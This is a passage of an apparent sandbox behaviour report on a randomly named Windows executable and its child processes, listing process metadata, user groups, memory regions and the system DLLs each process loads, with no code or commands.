Region: id = 3786 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 3787 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 94 os_tid = 0xbfc Thread: id = 100 os_tid = 0x5c8 Process: id = "19" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd8a4000" os_pid = "0x848" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3395 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3396 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3397 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3398 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3399 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3400 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3401 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3402 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3403 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3404 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3405 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3406 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3407 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3408 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3409 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3410 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3576 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3577 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3578 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3579 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3580 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3581 start_va = 0x590000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3582 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3583 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3584 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3585 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3586 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3587 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3588 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3589 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3590 start_va = 0x730000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 3591 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3751 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3752 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3753 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3754 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3755 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3756 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3757 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3758 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3759 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3760 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3761 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3762 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3763 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3764 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3765 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3766 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3788 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3789 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3790 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3791 start_va = 0x830000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 3792 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 96 os_tid = 0x88c Thread: id = 102 os_tid = 0xda8 Process: id = "20" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x37ea9000" os_pid = "0x844" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3793 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3794 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3795 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3796 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3797 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3798 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3799 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3800 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3801 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3802 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3803 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3804 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3805 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3806 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3807 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3808 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3809 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3810 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3811 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3812 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3813 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3814 start_va = 0x480000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3815 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3816 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3833 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3834 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3835 start_va = 0x5e0000 end_va = 0x69dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3836 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3837 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3865 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3866 start_va = 0x4e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3867 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3868 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3869 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3870 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3871 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3872 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3873 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3874 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3891 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3892 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3893 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3894 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3895 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3896 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3897 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3898 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3899 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3900 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3901 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4028 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 4029 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4030 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 4031 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 107 os_tid = 0xdb8 Thread: id = 110 os_tid = 0x84c Process: id = "21" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd5ae000" os_pid = "0x810" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3817 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3818 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3819 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3820 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3821 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3822 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3823 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3824 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3825 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3826 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3827 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3828 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3829 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3830 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3831 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 